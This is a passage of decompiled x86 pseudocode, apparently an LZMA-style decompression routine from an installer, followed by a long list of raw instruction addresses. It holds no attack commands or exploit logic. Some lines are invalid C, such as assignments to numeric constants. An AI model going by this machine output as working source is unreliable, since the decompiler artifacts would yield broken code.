											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                        0x00000000
                                                        0x00406f8c
                                                        0x00406f8c
                                                        0x00406f90
                                                        0x00406fb5
                                                        0x00406fbf
                                                        0x00000000
                                                        0x00406f92
                                                        0x00406f92
                                                        0x00406f95
                                                        0x00406f99
                                                        0x00406f9c
                                                        0x00406f9f
                                                        0x00406fa3
                                                        0x00406fa3
                                                        0x00406fa6
                                                        0x00407080
                                                        0x00407080
                                                        0x00407087
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x004070be
                                                        0x004070c2
                                                        0x00407122
                                                        0x00407125
                                                        0x0040712a
                                                        0x0040712b
                                                        0x0040712d
                                                        0x0040712f
                                                        0x00407132
                                                        0x0040703e
                                                        0x0040703e
                                                        0x0040703e
                                                        0x004067da
                                                        0x004067da
                                                        0x004067da
                                                        0x004067e3
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x00000000
                                                        0x004067f4
                                                        0x00000000
                                                        0x00000000
                                                        0x004067fd
                                                        0x00406800
                                                        0x00406803
                                                        0x00406807
                                                        0x00000000
                                                        0x00000000
                                                        0x0040680d
                                                        0x00406810
                                                        0x00406812
                                                        0x00406813
                                                        0x00406816
                                                        0x00406818
                                                        0x00406819
                                                        0x0040681b
                                                        0x0040681e
                                                        0x00406823
                                                        0x00406828
                                                        0x00406831
                                                        0x00406844
                                                        0x00406847
                                                        0x00406853
                                                        0x0040687b
                                                        0x0040687d
                                                        0x0040688b
                                                        0x0040688b
                                                        0x0040688f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040687f
                                                        0x0040687f
                                                        0x00406882
                                                        0x00406883
                                                        0x00406883
                                                        0x00000000
                                                        0x0040687f
                                                        0x00406859
                                                        0x0040685e
                                                        0x0040685e
                                                        0x00406867
                                                        0x0040686f
                                                        0x00406872
                                                        0x00000000
                                                        0x00406878
                                                        0x00406878
                                                        0x00000000
                                                        0x00406878
                                                        0x00000000
                                                        0x00406895
                                                        0x00406895
                                                        0x00406899
                                                        0x00407145
                                                        0x00000000
                                                        0x00407145
                                                        0x004068a2
                                                        0x004068b2
                                                        0x004068b5
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068bb
                                                        0x004068bf
                                                        0x00000000
                                                        0x00000000
                                                        0x004068c1
                                                        0x004068c7
                                                        0x004068f1
                                                        0x004068f7
                                                        0x004068fe
                                                        0x00000000
                                                        0x004068fe
                                                        0x004068cd
                                                        0x004068d0
                                                        0x004068d5
                                                        0x004068d5
                                                        0x004068e0
                                                        0x004068e8
                                                        0x004068eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406930
                                                        0x00406936
                                                        0x00406939
                                                        0x00406946
                                                        0x0040694e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406905
                                                        0x00406905
                                                        0x00406909
                                                        0x00407154
                                                        0x00000000
                                                        0x00407154
                                                        0x00406915
                                                        0x00406920
                                                        0x00406920
                                                        0x00406920
                                                        0x00406923
                                                        0x00406926
                                                        0x00406929
                                                        0x0040692e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x00407011
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00407013
                                                        0x00407017
                                                        0x004071c6
                                                        0x00000000
                                                        0x004071c6
                                                        0x00407023
                                                        0x0040702a
                                                        0x00407032
                                                        0x00407035
                                                        0x00407038
                                                        0x00407038
                                                        0x00000000
                                                        0x00000000
                                                        0x00406956
                                                        0x00406958
                                                        0x0040695b
                                                        0x004069cc
                                                        0x004069cf
                                                        0x004069d2
                                                        0x004069d9
                                                        0x004069e3
                                                        0x00000000
                                                        0x004069e3
                                                        0x0040695d
                                                        0x00406961
                                                        0x00406964
                                                        0x00406966
                                                        0x00406969
                                                        0x0040696c
                                                        0x0040696e
                                                        0x00406971
                                                        0x00406973
                                                        0x00406978
                                                        0x0040697b
                                                        0x0040697e
                                                        0x00406982
                                                        0x00406989
                                                        0x0040698c
                                                        0x00406993
                                                        0x00406997
                                                        0x0040699f
                                                        0x0040699f
                                                        0x0040699f
                                                        0x00406999
                                                        0x00406999
                                                        0x00406999
                                                        0x0040698e
                                                        0x0040698e
                                                        0x0040698e
                                                        0x004069a3
                                                        0x004069a6
                                                        0x004069c4
                                                        0x004069c6
                                                        0x00000000
                                                        0x004069a8
                                                        0x004069a8
                                                        0x004069ab
                                                        0x004069ae
                                                        0x004069b1
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b6
                                                        0x004069b9
                                                        0x004069bb
                                                        0x004069bc
                                                        0x004069bf
                                                        0x00000000
                                                        0x004069bf
                                                        0x00000000
                                                        0x00406bf5
                                                        0x00406bf9
                                                        0x00406c17
                                                        0x00406c1a
                                                        0x00406c21
                                                        0x00406c24
                                                        0x00406c27
                                                        0x00406c2a
                                                        0x00406c2d
                                                        0x00406c30
                                                        0x00406c32
                                                        0x00406c39
                                                        0x00406c3a
                                                        0x00406c3c
                                                        0x00406c3f
                                                        0x00406c42
                                                        0x00406c45
                                                        0x00406c45
                                                        0x00406c4a
                                                        0x00000000
                                                        0x00406c4a
                                                        0x00406bfb
                                                        0x00406bfe
                                                        0x00406c01
                                                        0x00406c0b
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c5f
                                                        0x00406c63
                                                        0x00406c86
                                                        0x00406c89
                                                        0x00406c8c
                                                        0x00406c96
                                                        0x00406c65
                                                        0x00406c65
                                                        0x00406c68
                                                        0x00406c6b
                                                        0x00406c6e
                                                        0x00406c7b
                                                        0x00406c7e
                                                        0x00406c7e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ca2
                                                        0x00406ca6
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cac
                                                        0x00406cb0
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cb6
                                                        0x00406cb8
                                                        0x00406cbc
                                                        0x00406cbc
                                                        0x00406cbf
                                                        0x00406cc3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d13
                                                        0x00406d17
                                                        0x00406d1e
                                                        0x00406d21
                                                        0x00406d24
                                                        0x00406d2e
                                                        0x00000000
                                                        0x00406d2e
                                                        0x00406d19
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d3a
                                                        0x00406d3e
                                                        0x00406d45
                                                        0x00406d48
                                                        0x00406d4b
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d4e
                                                        0x00406d51
                                                        0x00406d54
                                                        0x00406d54
                                                        0x00406d57
                                                        0x00406d5a
                                                        0x00406d5d
                                                        0x00406d5d
                                                        0x00406d60
                                                        0x00406d67
                                                        0x00406d6c
                                                        0x00000000
                                                        0x00000000
                                                        0x00406dfa
                                                        0x00406dfa
                                                        0x00406dfe
                                                        0x0040719c
                                                        0x00000000
                                                        0x0040719c
                                                        0x00406e04
                                                        0x00406e07
                                                        0x00406e0a
                                                        0x00406e0e
                                                        0x00406e11
                                                        0x00406e17
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e1c
                                                        0x00406e1f
                                                        0x00000000
                                                        0x00000000
                                                        0x004069ef
                                                        0x004069ef
                                                        0x004069f3
                                                        0x00407160
                                                        0x00000000
                                                        0x00407160
                                                        0x004069f9
                                                        0x004069fc
                                                        0x004069ff
                                                        0x00406a03
                                                        0x00406a06
                                                        0x00406a0c
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a11
                                                        0x00406a14
                                                        0x00406a14
                                                        0x00406a17
                                                        0x00406a1a
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a20
                                                        0x00406a26
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a2c
                                                        0x00406a2c
                                                        0x00406a30
                                                        0x00406a33
                                                        0x00406a36
                                                        0x00406a39
                                                        0x00406a3c
                                                        0x00406a3d
                                                        0x00406a40
                                                        0x00406a42
                                                        0x00406a48
                                                        0x00406a4b
                                                        0x00406a4e
                                                        0x00406a51
                                                        0x00406a54
                                                        0x00406a57
                                                        0x00406a5a
                                                        0x00406a76
                                                        0x00406a79
                                                        0x00406a7c
                                                        0x00406a7f
                                                        0x00406a86
                                                        0x00406a8a
                                                        0x00406a8c
                                                        0x00406a90
                                                        0x00406a5c
                                                        0x00406a5c
                                                        0x00406a60
                                                        0x00406a68
                                                        0x00406a6d
                                                        0x00406a6f
                                                        0x00406a71
                                                        0x00406a71
                                                        0x00406a93
                                                        0x00406a9a
                                                        0x00406a9d
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa8
                                                        0x00406aa8
                                                        0x00406aac
                                                        0x0040716c
                                                        0x00000000
                                                        0x0040716c
                                                        0x00406ab2
                                                        0x00406ab5
                                                        0x00406ab8
                                                        0x00406abc
                                                        0x00406abf
                                                        0x00406ac5
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406aca
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406ad3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ad5
                                                        0x00406ad8
                                                        0x00406adb
                                                        0x00406ade
                                                        0x00406ae1
                                                        0x00406ae4
                                                        0x00406ae7
                                                        0x00406aea
                                                        0x00406aed
                                                        0x00406af0
                                                        0x00406af3
                                                        0x00406b0b
                                                        0x00406b0e
                                                        0x00406b11
                                                        0x00406b14
                                                        0x00406b14
                                                        0x00406b17
                                                        0x00406b1b
                                                        0x00406b1d
                                                        0x00406af5
                                                        0x00406af5
                                                        0x00406afd
                                                        0x00406b02
                                                        0x00406b04
                                                        0x00406b06
                                                        0x00406b06
                                                        0x00406b20
                                                        0x00406b27
                                                        0x00406b2a
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00406b2a
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b6c
                                                        0x00406b6c
                                                        0x00406b70
                                                        0x00407178
                                                        0x00000000
                                                        0x00407178
                                                        0x00406b76
                                                        0x00406b79
                                                        0x00406b7c
                                                        0x00406b80
                                                        0x00406b83
                                                        0x00406b89
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8e
                                                        0x00406b91
                                                        0x00406b91
                                                        0x00406b97
                                                        0x00406b35
                                                        0x00406b35
                                                        0x00406b38
                                                        0x00000000
                                                        0x00406b38
                                                        0x00406b99
                                                        0x00406b99
                                                        0x00406b9c
                                                        0x00406b9f
                                                        0x00406ba2
                                                        0x00406ba5
                                                        0x00406ba8
                                                        0x00406bab
                                                        0x00406bae
                                                        0x00406bb1
                                                        0x00406bb4
                                                        0x00406bb7
                                                        0x00406bcf
                                                        0x00406bd2
                                                        0x00406bd5
                                                        0x00406bd8
                                                        0x00406bd8
                                                        0x00406bdb
                                                        0x00406bdf
                                                        0x00406be1
                                                        0x00406bb9
                                                        0x00406bb9
                                                        0x00406bc1
                                                        0x00406bc6
                                                        0x00406bc8
                                                        0x00406bca
                                                        0x00406bca
                                                        0x00406be4
                                                        0x00406beb
                                                        0x00406bee
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406e7d
                                                        0x00406e7d
                                                        0x00406e81
                                                        0x004071a8
                                                        0x00000000
                                                        0x004071a8
                                                        0x00406e87
                                                        0x00406e8a
                                                        0x00406e8d
                                                        0x00406e91
                                                        0x00406e94
                                                        0x00406e9a
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c4d
                                                        0x00406c4d
                                                        0x00406c50
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00407049
                                                        0x0040704d
                                                        0x0040706b
                                                        0x0040706b
                                                        0x0040706b
                                                        0x00407072
                                                        0x00407079
                                                        0x00000000
                                                        0x00407079
                                                        0x0040704f
                                                        0x00407052
                                                        0x00407055
                                                        0x00407058
                                                        0x0040705f
                                                        0x00000000
                                                        0x00000000
                                                        0x0040713a
                                                        0x0040713d
                                                        0x0040703e
                                                        0x0040703e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d74
                                                        0x00406d76
                                                        0x00406d7d
                                                        0x00406d7e
                                                        0x00406d80
                                                        0x00406d83
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d8b
                                                        0x00406d8e
                                                        0x00406d91
                                                        0x00406d93
                                                        0x00406d95
                                                        0x00406d95
                                                        0x00406d96
                                                        0x00406d99
                                                        0x00406da0
                                                        0x00406da3
                                                        0x00406db1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00407096
                                                        0x00407096
                                                        0x0040709a
                                                        0x004071d2
                                                        0x00000000
                                                        0x004071d2
                                                        0x004070a0
                                                        0x004070a3
                                                        0x004070a6
                                                        0x004070aa
                                                        0x004070ad
                                                        0x004070b3
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b8
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x00000000
                                                        0x00000000
                                                        0x00406db9
                                                        0x00406dbc
                                                        0x00406df2
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f25
                                                        0x00406f25
                                                        0x00406f28
                                                        0x00406f2a
                                                        0x004071b4
                                                        0x00000000
                                                        0x004071b4
                                                        0x00406f30
                                                        0x00406f33
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f39
                                                        0x00406f3d
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00000000
                                                        0x00406f40
                                                        0x00406dbe
                                                        0x00406dc0
                                                        0x00406dc2
                                                        0x00406dc4
                                                        0x00406dc7
                                                        0x00406dc8
                                                        0x00406dca
                                                        0x00406dcc
                                                        0x00406dcf
                                                        0x00406dd2
                                                        0x00406de8
                                                        0x00406ded
                                                        0x00406e25
                                                        0x00406e25
                                                        0x00406e29
                                                        0x00406e55
                                                        0x00406e57
                                                        0x00406e5e
                                                        0x00406e61
                                                        0x00406e64
                                                        0x00406e64
                                                        0x00406e69
                                                        0x00406e69
                                                        0x00406e6b
                                                        0x00406e6e
                                                        0x00406e75
                                                        0x00406e78
                                                        0x00406ea5
                                                        0x00406ea5
                                                        0x00406ea8
                                                        0x00406eab
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00000000
                                                        0x00406f1f
                                                        0x00406ead
                                                        0x00406eb3
                                                        0x00406eb6
                                                        0x00406eb9
                                                        0x00406ebc
                                                        0x00406ebf
                                                        0x00406ec2
                                                        0x00406ec5
                                                        0x00406ec8
                                                        0x00406ecb
